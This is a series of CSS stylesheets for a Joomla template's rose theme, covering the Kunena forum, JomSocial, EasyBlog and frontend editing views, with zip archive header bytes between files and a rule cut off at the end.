#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #8f0072;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-right: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: left;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-left: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  left: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #db00af;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 30px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-right: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-left: 0;
    margin-right: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-left: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-left: 15px;
    padding-right: 15px;
    margin-left: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 10px 10px 0;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #db00af;
  color: #db00af;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-right: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #db00af;
  border: 1px solid #db00af;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  content: " ";
  display: table;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-left: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: left;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  content: " ";
  display: table;
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-right: 5px;
  margin-bottom: 10px;
  float: left;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: right;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-right: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-right: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-left: 1px solid #eeeeee;
  margin-left: -1px;
  padding-left: 20px;
  padding-right: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: right;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  content: " ";
  display: table;
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-left: 10px;
  padding-right: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-right: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #db00af;
  color: #db00af;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #db00af;
  border-color: #db00af;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  content: " ";
  display: table;
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: left;
}
#kunena.layout ul.pagination li + li {
  border-left: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  opacity: 0.4;
  filter: alpha(opacity=40);
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-left: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}PKԜ�\X�_��9purity_iii/local/css/themes/rose/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}PKԜ�\��{�qq;purity_iii/local/css/themes/rose/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #db00af;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #db00af;
  text-decoration: none;
}PKԜ�\�y���8purity_iii/local/css/themes/rose/extras/com_easyblog.cssnu&1i�#eblog-wrapper .btn-eb-navbar {
  height: 30px;
  width: 44px;
}
#eblog-wrapper #eblog-search .search-input input {
  height: 30px !important;
}
.ezb-mod.mod_easyblogcategories .mod-item {
  padding-top: 20px !important;
}
div#fd.eb .eb-post + .eb-post {
  border-top: 1px solid #eeeeee;
  padding-top: 40px;
}
.mod-es-recent-blogs .es-nav-blogs {
  margin: 0;
  padding: 0;
}
.mod-es-recent-blogs .es-nav-blogs li {
  list-style-type: none;
}
.mod-es-recent-blogs .es-nav-blogs li .media-object {
  margin-bottom: 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media {
  padding: 0 !important;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object {
  float: none !important;
  padding: 0;
  margin: 0 0 20px;
}
.t3-sidebar #fd.mod-es-recent-blogs .media .media-object img {
  max-width: 100%;
}
.mod-easyblogtagcloud .tag-cloud {
  margin: 0 10px 5px 0;
  display: inline-block;
  line-height: normal !important;
}PKԜ�\=[����:purity_iii/local/css/themes/rose/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKԜ�\+e���;purity_iii/local/css/themes/rose/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKԜ�\BL���;purity_iii/local/css/themes/rose/extras/com_easydiscuss.cssnu&1i�#discuss-wrapper .nav-collapse.collapse {
  display: block;
}
#discuss-wrapper .nav-collapse.collapse .modal-body .row-fluid {
  margin-left: 0;
  margin-right: 0;
}PKԜ�\y֦Jl+l+2purity_iii/local/css/themes/rose/frontend-edit.cssnu&1i�.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  content: " ";
  display: table;
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 30px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 30px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  content: " ";
  display: table;
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0px;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
